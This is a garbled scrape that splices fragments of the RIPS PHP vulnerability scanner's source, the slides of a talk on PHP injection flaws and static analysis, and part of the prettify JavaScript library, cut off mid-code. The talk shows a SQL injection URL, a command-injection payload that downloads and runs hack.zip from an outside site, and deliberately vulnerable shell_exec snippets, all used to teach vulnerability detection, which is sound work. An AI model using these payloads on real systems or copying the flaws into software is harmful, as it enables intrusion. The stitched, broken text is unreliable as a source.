$new_var->comment = $new_var->comment . " by $token_value()"; if(!isset($this->var_declares_global[$var_name])) $this->var_declares_global[$var_name] = array($new_var); else array_unshift($this->var_declares_global[$var_name], $new_var); } } } } } /************************* FILE INCLUSION *************************/ // include tokens from included files else if( in_array($token_name, Tokens::$T_INCLUDES) && !$this->in_function) { $GLOBALS['count_inc']++; // include('xxx') if ( (($this->tokens[$i+1] === '(' && $this->tokens[$i+2][0] === T_CONSTANT_ENCAPSED_STRING && $this->tokens[$i+3] === ')') // include 'xxx' || (is_array($this->tokens[$i+1]) && $this->tokens[$i+1][0] === T_CONSTANT_ENCAPSED_STRING && $this->tokens[$i+2] === ';' )) ) { // include('file') if($this->tokens[$i+1] === '(') { $inc_file = substr($this->tokens[$i+2][1], 1, -1); $skip = 5; } // include 'file' else { $inc_file = substr($this->tokens[$i+1][1], 1, -1); $skip = 3; } } // dynamic include else { $inc_file = Analyzer::get_tokens_value( $this->file_pointer, array_slice($this->tokens, $i+1, $c=Analyzer::getBraceEnd($this->tokens, $i+1)+1), $this->in_function ? $this->var_declares_local : $this->var_declares_global, $this->var_declares_global, $i ); // in case the get_var_value added several php files, take the first $several = explode('.php', $inc_file); if(count($several) > 1) $try_file = $several[0] . '.php'; $skip = $c+1; // important to save $c+1 here } $try_file = $inc_file; // try absolute include path foreach($this->include_paths as $include_path) { if(is_file("$include_path/$try_file")) { $try_file = "$include_path/$try_file"; break; } } // if dirname(__FILE__) appeared it was an absolute path if(!is_file($try_file)) { // check relativ path $try_file = dirname($this->file_name). '/' . $inc_file; if(!is_file($try_file)) { $other_try_file = dirname($this->file_pointer). '/' . $inc_file; // if file can not be found check include_path if set if(!is_file($other_try_file)) { if(isset($this->include_paths[0])) { foreach($this->include_paths as $include_path) { if(is_file(dirname($this->file_name).'/'.$include_path.'/'.$inc_file)) { $try_file = dirname($this->file_name).'/'.$include_path.'/'.$inc_file; break; } else if(is_file(dirname($this->file_pointer).'/'.$include_path.'/'.$inc_file)) { $try_file = dirname($this->file_pointer).'/'.$include_path.'/'.$inc_file; break; } } } // if still not a valid file, look a directory above if(!is_file($try_file)) { $try_file = str_replace('\\', '/', $try_file); $pos = strlen($try_file); // replace each found / with /../, start from the end of file name for($c=1; $c
"; //hide metadata
for($fit=0; $fit<$file_amount; $fit++)
{
// for scanning display
$thisfile_start = microtime(TRUE);
$file_scanning = $files[$fit];
echo ($fit) . '|' . $file_amount . '|' . $file_scanning . '|' . $timeleft . '|' . "\n";
@ob_flush();
flush();
// scan
$scan = new Scanner($file_scanning, $scan_functions, $info_functions, $source_functions);
$scan->parse();
$scanned_files[$file_scanning] = $scan->inc_map;
$overall_time += microtime(TRUE) - $thisfile_start;
// timeleft = average_time_per_file * file_amount_left
$timeleft = round(($overall_time/($fit+1)) * ($file_amount - $fit+1),2);
}
#die("done");
echo "STATS_DONE.\n";
if (defined("MODE_CLI"))
echo "\n
"; //hide metadata
@ob_flush();
flush();
}
// SEARCH
else if(!empty($_POST['regex']))
{
$count_matches = 0;
$verbosity = 0;
foreach($files as $file_name)
{
searchFile($file_name, $_POST['regex']);
}
}
}
$elapsed = microtime(TRUE) - $start;
################################ RESULT #################################
?>
↵ return
(graph not available in debug mode)'; ?>
| Result |
|---|
| Sum: | ',$count_all,' |
| No vulnerabilities found. | |
| ',(($count_matches == 0) ? 'No' : $count_matches),' matches found. | |
| Scanned files: | ',count($files),' | |
| Include success: | '; if($count_inc > 0) { echo ($count_inc_success=$count_inc-$count_inc_fail).'/'.$count_inc, ' ('.$round_inc_success=round(($count_inc_success/$count_inc)*100,0).'%)'; } else { echo 'No includes.'; } echo ' | |
| Considered sinks: | ',count($scan_functions),' | '; if(empty($_POST['search']) && $count_all > 0) { echo ''; } echo ' |
| User-defined functions: | '.(count($user_functions_offset)-(count($user_functions_offset)>0?1:0)).' | |
| Unique sources: | '.count($user_input).' | |
| Sensitive sinks: | '.(is_array($file_sinks_count) ? array_sum($file_sinks_count) : 0).' | |
'; // output info gathering if( !empty($info) || ($count_inc>0 && $round_inc_success < 75 && !$scan_subdirs && count($files)>1) ) { $info = array_unique($info); echo '
| Info: | ',$detail,' |
| Info: | Your include success is low. Enable subdirs for better filename guesses. |
'; } echo '
with state-of-the-art code analysis!
'; } ?>
| Scan time: |
Vulnerabilities crash course
Unsanitized user input
Quick quiz:
What happens next?
$id = $_GET['id']; $username = "user" . $id; mysqli_query( " SELECT * FROM Users WHERE Username = '" . $username . "' AND Valid = 1" );
Source: http://lotr.wikia.com
Problem:
http://example.com/?id=1' OR 1 #
$id = $_GET['id']; $username = "user" . $id; mysqli_query( " SELECT * FROM Users WHERE Username = '" . $username . "' AND Valid = 1" );
SELECT * FROM Users WHERE Username = 'user1' OR 1 # AND Valid = 1"
Source: http://xkcd.com/327
title="Her daughter is named Help I'm trapped in a driver's license factory."
title="Her daughter is named Help I'm trapped in a driver's license factory."
Okay, but that was fairly obvious!
But what about...
foreach ( $_REQUEST as $key => $value ) { $$key = $value; } ... // 25 lines of miscellanious, unrelated code ... mysqli_query( "SELECT * FROM Users WHERE Username = '" . $username . "'" );
Source: http://lotr.wikia.com
"Just don't do it"
My problem:
$taintedCmd = "wc -w " . $_GET['file']; shell_exec( $taintedCmd );
Source: http://lotr.wikia.com
Problem:
http://example.com/?file=
file.txt' &&
wget http://dogeysite.com/hack.zip &&
unzip hack.zip &&
./hack.sh #
First thought:
grep -r -B 10 -i "shell_exec" >> commandExecutions.txt
... file.php- $cmd = "find -name '" . $name . "' documents/"; file.php- } file.php- } file.php: echo shell_exec( $cmd );
http://www.sciencephoto.com
But...
http://looneytunes09.files.wordpress.com/2010/08/landfill.jpg
How do you detect vulnerabilities in code?
http://www.google.com.au/search?q=
how+do+you+detect+vulnerabilities+in+code
Static Code Analysis (SCA)
Source Code Analysis
Static Program Analysis
Compile Time Analysis (well, not for PHP)
Analysis without execution
Optimising compilers (e.g. g++)
IDE's with type checking/code completion
Step 1: Lexical analysis
Split code into tokens
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
Step 2: Semantic analysis
print "print";
First print is a command
Second print is a string
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
Step 3: Control flow analysis
function firstCall( $input ) { return secondCall( $input ) . " - 1st"; } function secondCall( $input ) { return $input . " - 2nd"; } firstCall( "input" );
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
Step 4: Data flow analysis
function firstCall( $input ) { return secondCall( escapeshellarg( $input ) ); } function secondCall( $input ) { return shell_exec( $input ); // Is $input safe? } firstCall( $_GET['input'] ); // Safe secondCall( $_GET['input'] ); // Not-safe
Source: http://sourceforge.net/projects/rips-scanner/files/rips-paper.pdf/download
http://www.flickr.com/photos/ruthyyy/5000648691
RIPS - PHP Scanner
http://www.phpscanner.net
Example time
Example 1
shell_exec( $_GET['input'] );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln1.php
/srv/http-rips/tests/vuln1.php
Example 2
function vulnFunction( $cmd ) { $result = shell_exec( $cmd ); } function intermittentFunction( $input ) { $param = "test " . $input . " bleh"; vulnFunction( $param ); } $firstHand = $_GET['input']; $secondHand = "IMZ TAINTED: " . $firstHand . ", YEAH!"; intermittentFunction( $secondHand );
http://rips.gamma.peter.serwylo.com/
/srv/http-rips/tests/vuln2.php
/srv/http-rips/tests/vuln2.php
Miscellanious PHP projects from freecode.com
(formally freshmeat.net)
Example 3
False Positives
http://www.cancrusher.co.za
Custom Securing Functions
http://winningateverything.com
Custom Securing Functions
config/securing.php
// securing functions for file handling $F_SECURING_FILE = array( 'sanitize_filename' );
Custom Securing Functions
config/securing.php
// securing functions for every vulnerability $F_SECURING_STRING = array( 'sanitize_int', 'intval', 'floatval', 'md5', ...
Limitations
- OOP not supported
- Can't successfully resolve all includes
- Browser based
- Slow to scan
What I'd love to see
Plugins for php compilers (e.g. HipHop/phc/rphp)
- Written in C++ for improved performance
- Already have established parsers
- Already analyse code for optimisations
Thanks for listening
Questions?
* For a fairly comprehensive set of languages see the * README * file that came with this source. At a minimum, the lexer should work on a * number of languages including C and friends, Java, Python, Bash, SQL, HTML, * XML, CSS, Javascript, and Makefiles. It works passably on Ruby, PHP and Awk * and a subset of Perl, but, because of commenting conventions, doesn't work on * Smalltalk, Lisp-like, or CAML-like languages without an explicit lang class. *
* Usage:
-
*
- include this source file in an html page via * {@code } *
- define style rules. See the example page for examples. *
- mark the {@code
} and {@code} tags in your source with * {@code class=prettyprint.} * You can also use the (html deprecated) {@code} tag, but the pretty * printer needs to do more substantial DOM manipulations to support that, so * some css styles may not be preserved. * </ol> * That's it. I wanted to keep the API as simple as possible, so there's no * need to specify which language the code is in, but if you wish, you can add * another class to the {@code <pre>} or {@code <code>} element to specify the * language, as in {@code <pre class="prettyprint lang-java">}. Any class that * starts with "lang-" followed by a file extension, specifies the file type. * See the "lang-*.js" files in this directory for code that implements * per-language file handlers. * <p> * Change log:<br> * cbeust, 2006/08/22 * <blockquote> * Java annotations (start with "@") are now captured as literals ("lit") * </blockquote> * @requires console */ // JSLint declarations /*global console, document, navigator, setTimeout, window */ /** * Split {@code prettyPrint} into multiple timeouts so as not to interfere with * UI events. * If set to {@code false}, {@code prettyPrint()} is synchronous. */ window['PR_SHOULD_USE_CONTINUATION'] = true; /** the number of characters between tab columns */ window['PR_TAB_WIDTH'] = 8; /** Contains functions for creating and registering new language handlers. * @type {Object} */ window['PR'] /** Pretty print a chunk of code. * * @param {string} sourceCodeHtml code as html * @return {string} code as html, but prettier */ = window['prettyPrintOne'] /** Find all the {@code <pre>} and {@code <code>} tags in the DOM with * {@code class=prettyprint} and prettify them. * @param {Function?} opt_whenDone if specified, called when the last entry * has been finished. */ = window['prettyPrint'] = void 0; (function () { // Keyword lists for various languages. var FLOW_CONTROL_KEYWORDS = "break continue do else for if return while "; var C_KEYWORDS = FLOW_CONTROL_KEYWORDS + "auto case char const default " + "double enum extern float goto int long register short signed sizeof " + "static struct switch typedef union unsigned void volatile "; var COMMON_KEYWORDS = C_KEYWORDS + "catch class delete false import " + "new operator private protected public this throw true try typeof "; var CPP_KEYWORDS = COMMON_KEYWORDS + "alignof align_union asm axiom bool " + "concept concept_map const_cast constexpr decltype " + "dynamic_cast explicit export friend inline late_check " + "mutable namespace nullptr reinterpret_cast static_assert static_cast " + "template typeid typename using virtual wchar_t where "; var JAVA_KEYWORDS = COMMON_KEYWORDS + "abstract boolean byte extends final finally implements import " + "instanceof null native package strictfp super synchronized throws " + "transient "; var CSHARP_KEYWORDS = JAVA_KEYWORDS + "as base by checked decimal delegate descending dynamic event " + "fixed foreach from group implicit in interface internal into is lock " + "object out override orderby params partial readonly ref sbyte sealed " + "stackalloc string select uint ulong unchecked unsafe ushort var "; var COFFEE_KEYWORDS = "all and by catch class else extends false finally " + "for if in is isnt loop new no not null of off on or return super then " + "true try unless until when while yes "; var JSCRIPT_KEYWORDS = COMMON_KEYWORDS + "debugger eval export function get null set undefined var with " + "Infinity NaN "; var PERL_KEYWORDS = "caller delete die do dump elsif eval exit foreach for " + "goto if import last local my next no our print package redo require " + "sub undef unless until use wantarray while BEGIN END "; var PYTHON_KEYWORDS = FLOW_CONTROL_KEYWORDS + "and as assert class def del " + "elif except exec finally from global import in is lambda " + "nonlocal not or pass print raise try with yield " + "False True None "; var RUBY_KEYWORDS = FLOW_CONTROL_KEYWORDS + "alias and begin case class def" + " defined elsif end ensure false in module next nil not or redo rescue " + "retry self super then true undef unless until when yield BEGIN END "; var SH_KEYWORDS = FLOW_CONTROL_KEYWORDS + "case done elif esac eval fi " + "function in local set then until "; var ALL_KEYWORDS = ( CPP_KEYWORDS + CSHARP_KEYWORDS + JSCRIPT_KEYWORDS + PERL_KEYWORDS + PYTHON_KEYWORDS + RUBY_KEYWORDS + SH_KEYWORDS); // token style names. correspond to css classes /** token style for a string literal */ var PR_STRING = 'str'; /** token style for a keyword */ var PR_KEYWORD = 'kwd'; /** token style for a comment */ var PR_COMMENT = 'com'; /** token style for a type */ var PR_TYPE = 'typ'; /** token style for a literal value. e.g. 1, null, true. */ var PR_LITERAL = 'lit'; /** token style for a punctuation string. */ var PR_PUNCTUATION = 'pun'; /** token style for a punctuation string. */ var PR_PLAIN = 'pln'; /** token style for an sgml tag. */ var PR_TAG = 'tag'; /** token style for a markup declaration such as a DOCTYPE. */ var PR_DECLARATION = 'dec'; /** token style for embedded source. */ var PR_SOURCE = 'src'; /** token style for an sgml attribute name. */ var PR_ATTRIB_NAME = 'atn'; /** token style for an sgml attribute value. */ var PR_ATTRIB_VALUE = 'atv'; /** * A class that indicates a section of markup that is not code, e.g. to allow * embedding of line numbers within code listings. */ var PR_NOCODE = 'nocode'; /** A set of tokens that can precede a regular expression literal in * javascript. * http://www.mozilla.org/js/language/js20/rationale/syntax.html has the full * list, but I've removed ones that might be problematic when seen in * languages that don't support regular expression literals. * * <p>Specifically, I've removed any keywords that can't precede a regexp * literal in a syntactically legal javascript program, and I've removed the * "in" keyword since it's not a keyword in many languages, and might be used * as a count of inches. * * <p>The link a above does not accurately describe EcmaScript rules since * it fails to distinguish between (a=++/b/i) and (a++/b/i) but it works * very well in practice. * * @private */ var REGEXP_PRECEDER_PATTERN = function () { var preceders = [ "!", "!=", "!==", "#", "%", "%=", "&", "&&", "&&=", "&=", "(", "*", "*=", /* "+", */ "+=", ",", /* "-", */ "-=", "->", /*".", "..", "...", handled below */ "/", "/=", ":", "::", ";", "<", "<<", "<<=", "<=", "=", "==", "===", ">", ">=", ">>", ">>=", ">>>", ">>>=", "?", "@", "[", "^", "^=", "^^", "^^=", "{", "|", "|=", "||", "||=", "~" /* handles =~ and !~ */, "break", "case", "continue", "delete", "do", "else", "finally", "instanceof", "return", "throw", "try", "typeof" ]; var pattern = '(?:^^|[+-]'; for (var i = 0; i < preceders.length; ++i) { pattern += '|' + preceders[i].replace(/([^=<>:&a-z])/g, '\\$1'); } pattern += ')\\s*'; // matches at end, and matches empty string return pattern; // CAVEAT: this does not properly handle the case where a regular // expression immediately follows another since a regular expression may // have flags for case-sensitivity and the like. Having regexp tokens // adjacent is not valid in any language I'm aware of, so I'm punting. // TODO: maybe style special characters inside a regexp as punctuation. }(); /** * Given a group of {@link RegExp}s, returns a {@code RegExp} that globally * matches the union of the sets of strings matched by the input RegExp. * Since it matches globally, if the input strings have a start-of-input * anchor (/^.../), it is ignored for the purposes of unioning. * @param {Array.<RegExp>} regexs non multiline, non-global regexs. * @return {RegExp} a global regex. */ function combinePrefixPatterns(regexs) { var capturedGroupIndex = 0; var needToFoldCase = false; var ignoreCase = false; for (var i = 0, n = regexs.length; i < n; ++i) { var regex = regexs[i]; if (regex.ignoreCase) { ignoreCase = true; } else if (/[a-z]/i.test(regex.source.replace( /\\u[0-9a-f]{4}|\\x[0-9a-f]{2}|\\[^ux]/gi, ''))) { needToFoldCase = true; ignoreCase = false; break; } } function decodeEscape(charsetPart) { if (charsetPart.charAt(0) !== '\\') { return charsetPart.charCodeAt(0); } switch (charsetPart.charAt(1)) { case 'b': return 8; case 't': return 9; case 'n': return 0xa; case 'v': return 0xb; case 'f': return 0xc; case 'r': return 0xd; case 'u': case 'x': return parseInt(charsetPart.substring(2), 16) || charsetPart.charCodeAt(1); case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': return parseInt(charsetPart.substring(1), 8); default: return charsetPart.charCodeAt(1); } } function encodeEscape(charCode) { if (charCode < 0x20) { return (charCode < 0x10 ? '\\x0' : '\\x') + charCode.toString(16); } var ch = String.fromCharCode(charCode); if (ch === '\\' || ch === '-' || ch === '[' || ch === ']') { ch = '\\' + ch; } return ch; } function caseFoldCharset(charSet) { var charsetParts = charSet.substring(1, charSet.length - 1).match( new RegExp( '\\\\u[0-9A-Fa-f]{4}' + '|\\\\x[0-9A-Fa-f]{2}' + '|\\\\[0-3][0-7]{0,2}' + '|\\\\[0-7]{1,2}' + '|\\\\[\\s\\S]' + '|-' + '|[^-\\\\]', 'g')); var groups = []; var ranges = []; var inverse = charsetParts[0] === '^'; for (var i = inverse ? 1 : 0, n = charsetParts.length; i < n; ++i) { var p = charsetParts[i]; switch (p) { case '\\B': case '\\b': case '\\D': case '\\d': case '\\S': case '\\s': case '\\W': case '\\w': groups.push(p); continue; } var start = decodeEscape(p); var end; if (i + 2 < n && '-' === charsetParts[i + 1]) { end = decodeEscape(charsetParts[i + 2]); i += 2; } else { end = start; } ranges.push([start, end]); // If the range might intersect letters, then expand it. if (!(end < 65 || start > 122)) { if (!(end < 65 || start > 90)) { ranges.push([Math.max(65, start) | 32, Math.min(end, 90) | 32]); } if (!(end < 97 || start > 122)) { ranges.push([Math.max(97, start) & ~32, Math.min(end, 122) & ~32]); } } } // [[1, 10], [3, 4], [8, 12], [14, 14], [16, 16], [17, 17]] // -> [[1, 12], [14, 14], [16, 17]] ranges.sort(function (a, b) { return (a[0] - b[0]) || (b[1] - a[1]); }); var consolidatedRanges = []; var lastRange = [NaN, NaN]; for (var i = 0; i < ranges.length; ++i) { var range = ranges[i]; if (range[0] <= lastRange[1] + 1) { lastRange[1] = Math.max(lastRange[1], range[1]); } else { consolidatedRanges.push(lastRange = range); } } var out = ['[']; if (inverse) { out.push('^'); } out.push.apply(out, groups); for (var i = 0; i < consolidatedRanges.length; ++i) { var range = consolidatedRanges[i]; out.push(encodeEscape(range[0])); if (range[1] > range[0]) { if (range[1] + 1 > range[0]) { out.push('-'); } out.push(encodeEscape(range[1])); } } out.push(']'); return out.join(''); } function allowAnywhereFoldCaseAndRenumberGroups(regex) { // Split into character sets, escape sequences, punctuation strings // like ('(', '(?:', ')', '^'), and runs of characters that do not // include any of the above. var parts = regex.source.match( new RegExp( '(?:' + '\\[(?:[^\\x5C\\x5D]|\\\\[\\s\\S])*\\]' // a character set + '|\\\\u[A-Fa-f0-9]{4}' // a unicode escape + '|\\\\x[A-Fa-f0-9]{2}' // a hex escape + '|\\\\[0-9]+' // a back-reference or octal escape + '|\\\\[^ux0-9]' // other escape sequence + '|\\(\\?[:!=]' // start of a non-capturing group + '|[\\(\\)\\^]' // start/emd of a group, or line start + '|[^\\x5B\\x5C\\(\\)\\^]+' // run of other characters + ')', 'g')); var n = parts.length; // Maps captured group numbers to the number they will occupy in // the output or to -1 if that has not been determined, or to // undefined if they need not be capturing in the output. var capturedGroups = []; // Walk over and identify back references to build the capturedGroups // mapping. for (var i = 0, groupIndex = 0; i < n; ++i) { var p = parts[i]; if (p === '(') { // groups are 1-indexed, so max group index is count of '(' ++groupIndex; } else if ('\\' === p.charAt(0)) { var decimalValue = +p.substring(1); if (decimalValue && decimalValue <= groupIndex) { capturedGroups[decimalValue] = -1; } } } // Renumber groups and reduce capturing groups to non-capturing groups // where possible. for (var i = 1; i < capturedGroups.length; ++i) { if (-1 === capturedGroups[i]) { capturedGroups[i] = ++capturedGroupIndex; } } for (var i = 0, groupIndex = 0; i < n; ++i) { var p = parts[i]; if (p === '(') { ++groupIndex; if (capturedGroups[groupIndex] === undefined) { parts[i] = '(?:'; } } else if ('\\' === p.charAt(0)) { var decimalValue = +p.substring(1); if (decimalValue && decimalValue <= groupIndex) { parts[i] = '\\' + capturedGroups[groupIndex]; } } } // Remove any prefix anchors so that the output will match anywhere. // ^^ really does mean an anchored match though. for (var i = 0, groupIndex = 0; i < n; ++i) { if ('^' === parts[i] && '^' !== parts[i + 1]) { parts[i] = ''; } } // Expand letters to groups to handle mixing of case-sensitive and // case-insensitive patterns if necessary. if (regex.ignoreCase && needToFoldCase) { for (var i = 0; i < n; ++i) { var p = parts[i]; var ch0 = p.charAt(0); if (p.length >= 2 && ch0 === '[') { parts[i] = caseFoldCharset(p); } else if (ch0 !== '\\') { // TODO: handle letters in numeric escapes. parts[i] = p.replace( /[a-zA-Z]/g, function (ch) { var cc = ch.charCodeAt(0); return '[' + String.fromCharCode(cc & ~32, cc | 32) + ']'; }); } } } return parts.join(''); } var rewritten = []; for (var i = 0, n = regexs.length; i < n; ++i) { var regex = regexs[i]; if (regex.global || regex.multiline) { throw new Error('' + regex); } rewritten.push( '(?:' + allowAnywhereFoldCaseAndRenumberGroups(regex) + ')'); } return new RegExp(rewritten.join('|'), ignoreCase ? 'gi' : 'g'); } /** * Split markup into a string of source code and an array mapping ranges in * that string to the text nodes in which they appear. * * <p> * The HTML DOM structure:</p> * <pre> * (Element "p" * (Element "b" * (Text "print ")) ; #1 * (Text "'Hello '") ; #2 * (Element "br") ; #3 * (Text " + 'World';")) ; #4 * </pre> * <p> * corresponds to the HTML * {@code <p><b>print </b>'Hello '<br> + 'World';</p>}.</p> * * <p> * It will produce the output:</p> * <pre> * { * source: "print 'Hello '\n + 'World';", * // 1 2 * // 012345678901234 5678901234567 * spans: [0, #1, 6, #2, 14, #3, 15, #4] * } * </pre> * <p> * where #1 is a reference to the {@code "print "} text node above, and so * on for the other text nodes. * </p> * * <p> * The {@code} spans array is an array of pairs. Even elements are the start * indices of substrings, and odd elements are the text nodes (or BR elements) * that contain the text for those substrings. * Substrings continue until the next index or the end of the source. * </p> * * @param {Node} node an HTML DOM subtree containing source-code. * @return {Object} source code and the text nodes in which they occur. */ function extractSourceSpans(node) { var nocode = /(?:^|\s)nocode(?:\s|$)/; var chunks = []; var length = 0; var spans = []; var k = 0; var whitespace; if (node.currentStyle) { whitespace = node.currentStyle.whiteSpace; } else if (window.getComputedStyle) { whitespace = document.defaultView.getComputedStyle(node, null) .getPropertyValue('white-space'); } var isPreformatted = whitespace && 'pre' === whitespace.substring(0, 3); function walk(node) { switch (node.nodeType) { case 1: // Element if (nocode.test(node.className)) { return; } for (var child = node.firstChild; child; child = child.nextSibling) { walk(child); } var nodeName = node.nodeName; if ('BR' === nodeName || 'LI' === nodeName) { chunks[k] = '\n'; spans[k << 1] = length++; spans[(k++ << 1) | 1] = node; } break; case 3: case 4: // Text var text = node.nodeValue; if (text.length) { if (!isPreformatted) { text = text.replace(/[ \t\r\n]+/g, ' '); } else { text = text.replace(/\r\n?/g, '\n'); // Normalize newlines. } // TODO: handle tabs here? chunks[k] = text; spans[k << 1] = length; length += text.length; spans[(k++ << 1) | 1] = node; } break; } } walk(node); return { source: chunks.join('').replace(/\n$/, ''), spans: spans }; } /** * Apply the given language handler to sourceCode and add the resulting * decorations to out. * @param {number} basePos the index of sourceCode within the chunk of source * whose decorations are already present on out. */ function appendDecorations(basePos, sourceCode, langHandler, out) { if (!sourceCode) { return; } var job = { source: sourceCode, basePos: basePos }; langHandler(job); out.push.apply(out, job.decorations); } /** Given triples of [style, pattern, context] returns a lexing function, * The lexing function interprets the patterns to find token boundaries and * returns a decoration list of the form * [index_0, style_0, index_1, style_1, ..., index_n, style_n] * where index_n is an index into the sourceCode, and style_n is a style * constant like PR_PLAIN. index_n-1 <= index_n, and style_n-1 applies to * all characters in sourceCode[index_n-1:index_n]. * * The stylePatterns is a list whose elements have the form * [style : string, pattern : RegExp, DEPRECATED, shortcut : string]. * * Style is a style constant like PR_PLAIN, or can be a string of the * form 'lang-FOO', where FOO is a language extension describing the * language of the portion of the token in $1 after pattern executes. * E.g., if style is 'lang-lisp', and group 1 contains the text * '(hello (world))', then that portion of the token will be passed to the * registered lisp handler for formatting. * The text before and after group 1 will be restyled using this decorator * so decorators should take care that this doesn't result in infinite * recursion. For example, the HTML lexer rule for SCRIPT elements looks * something like ['lang-js', /<[s]cript>(.+?)<\/script>/]. This may match * '<script>foo()<\/script>', which would cause the current decorator to * be called with '<script>' which would not match the same rule since * group 1 must not be empty, so it would be instead styled as PR_TAG by * the generic tag rule. The handler registered for the 'js' extension would * then be called with 'foo()', and finally, the current decorator would * be called with '<\/script>' which would not match the original rule and * so the generic tag rule would identify it as a tag. * * Pattern must only match prefixes, and if it matches a prefix, then that * match is considered a token with the same style. * * Context is applied to the last non-whitespace, non-comment token * recognized. * * Shortcut is an optional string of characters, any of which, if the first * character, gurantee that this pattern and only this pattern matches. * * @param {Array} shortcutStylePatterns patterns that always start with * a known character. Must have a shortcut string. * @param {Array} fallthroughStylePatterns patterns that will be tried in * order if the shortcut ones fail. May have shortcuts. * * @return {function (Object)} a * function that takes source code and returns a list of decorations. */ function createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns) { var shortcuts = {}; var tokenizer; (function () { var allPatterns = shortcutStylePatterns.concat(fallthroughStylePatterns); var allRegexs = []; var regexKeys = {}; for (var i = 0, n = allPatterns.length; i < n; ++i) { var patternParts = allPatterns[i]; var shortcutChars = patternParts[3]; if (shortcutChars) { for (var c = shortcutChars.length; --c >= 0;) { shortcuts[shortcutChars.charAt(c)] = patternParts; } } var regex = patternParts[1]; var k = '' + regex; if (!regexKeys.hasOwnProperty(k)) { allRegexs.push(regex); regexKeys[k] = null; } } allRegexs.push(/[\0-\uffff]/); tokenizer = combinePrefixPatterns(allRegexs); })(); var nPatterns = fallthroughStylePatterns.length; var notWs = /\S/; /** * Lexes job.source and produces an output array job.decorations of style * classes preceded by the position at which they start in job.source in * order. * * @param {Object} job an object like {@code * source: {string} sourceText plain text, * basePos: {int} position of job.source in the larger chunk of * sourceCode. * } */ var decorate = function (job) { var sourceCode = job.source, basePos = job.basePos; /** Even entries are positions in source in ascending order. Odd enties * are style markers (e.g., PR_COMMENT) that run from that position until * the end. * @type {Array.<number|string>} */ var decorations = [basePos, PR_PLAIN]; var pos = 0; // index into sourceCode var tokens = sourceCode.match(tokenizer) || []; var styleCache = {}; for (var ti = 0, nTokens = tokens.length; ti < nTokens; ++ti) { var token = tokens[ti]; var style = styleCache[token]; var match = void 0; var isEmbedded; if (typeof style === 'string') { isEmbedded = false; } else { var patternParts = shortcuts[token.charAt(0)]; if (patternParts) { match = token.match(patternParts[1]); style = patternParts[0]; } else { for (var i = 0; i < nPatterns; ++i) { patternParts = fallthroughStylePatterns[i]; match = token.match(patternParts[1]); if (match) { style = patternParts[0]; break; } } if (!match) { // make sure that we make progress style = PR_PLAIN; } } isEmbedded = style.length >= 5 && 'lang-' === style.substring(0, 5); if (isEmbedded && !(match && typeof match[1] === 'string')) { isEmbedded = false; style = PR_SOURCE; } if (!isEmbedded) { styleCache[token] = style; } } var tokenStart = pos; pos += token.length; if (!isEmbedded) { decorations.push(basePos + tokenStart, style); } else { // Treat group 1 as an embedded block of source code. var embeddedSource = match[1]; var embeddedSourceStart = token.indexOf(embeddedSource); var embeddedSourceEnd = embeddedSourceStart + embeddedSource.length; if (match[2]) { // If embeddedSource can be blank, then it would match at the // beginning which would cause us to infinitely recurse on the // entire token, so we catch the right context in match[2]. embeddedSourceEnd = token.length - match[2].length; embeddedSourceStart = embeddedSourceEnd - embeddedSource.length; } var lang = style.substring(5); // Decorate the left of the embedded source appendDecorations( basePos + tokenStart, token.substring(0, embeddedSourceStart), decorate, decorations); // Decorate the embedded source appendDecorations( basePos + tokenStart + embeddedSourceStart, embeddedSource, langHandlerForExtension(lang, embeddedSource), decorations); // Decorate the right of the embedded section appendDecorations( basePos + tokenStart + embeddedSourceEnd, token.substring(embeddedSourceEnd), decorate, decorations); } } job.decorations = decorations; }; return decorate; } /** returns a function that produces a list of decorations from source text. * * This code treats ", ', and ` as string delimiters, and \ as a string * escape. It does not recognize perl's qq() style strings. * It has no special handling for double delimiter escapes as in basic, or * the tripled delimiters used in python, but should work on those regardless * although in those cases a single string literal may be broken up into * multiple adjacent string literals. * * It recognizes C, C++, and shell style comments. * * @param {Object} options a set of optional parameters. * @return {function (Object)} a function that examines the source code * in the input job and builds the decoration list. */ function sourceDecorator(options) { var shortcutStylePatterns = [], fallthroughStylePatterns = []; if (options['tripleQuotedStrings']) { // '''multi-line-string''', 'single-line-string', and double-quoted shortcutStylePatterns.push( [PR_STRING, /^(?:\'\'\'(?:[^\'\\]|\\[\s\S]|\'{1,2}(?=[^\']))*(?:\'\'\'|$)|\"\"\"(?:[^\"\\]|\\[\s\S]|\"{1,2}(?=[^\"]))*(?:\"\"\"|$)|\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$))/, null, '\'"']); } else if (options['multiLineStrings']) { // 'multi-line-string', "multi-line-string" shortcutStylePatterns.push( [PR_STRING, /^(?:\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$)|\`(?:[^\\\`]|\\[\s\S])*(?:\`|$))/, null, '\'"`']); } else { // 'single-line-string', "single-line-string" shortcutStylePatterns.push( [PR_STRING, /^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$)|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/, null, '"\'']); } if (options['verbatimStrings']) { // verbatim-string-literal production from the C# grammar. See issue 93. fallthroughStylePatterns.push( [PR_STRING, /^@\"(?:[^\"]|\"\")*(?:\"|$)/, null]); } var hc = options['hashComments']; if (hc) { if (options['cStyleComments']) { if (hc > 1) { // multiline hash comments shortcutStylePatterns.push( [PR_COMMENT, /^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/, null, '#']); } else { // Stop C preprocessor declarations at an unclosed open comment shortcutStylePatterns.push( [PR_COMMENT, /^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\r\n]*)/, null, '#']); } fallthroughStylePatterns.push( [PR_STRING, /^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/, null]); } else { shortcutStylePatterns.push([PR_COMMENT, /^#[^\r\n]*/, null, '#']); } } if (options['cStyleComments']) { fallthroughStylePatterns.push([PR_COMMENT, /^\/\/[^\r\n]*/, null]); fallthroughStylePatterns.push( [PR_COMMENT, /^\/\*[\s\S]*?(?:\*\/|$)/, null]); } if 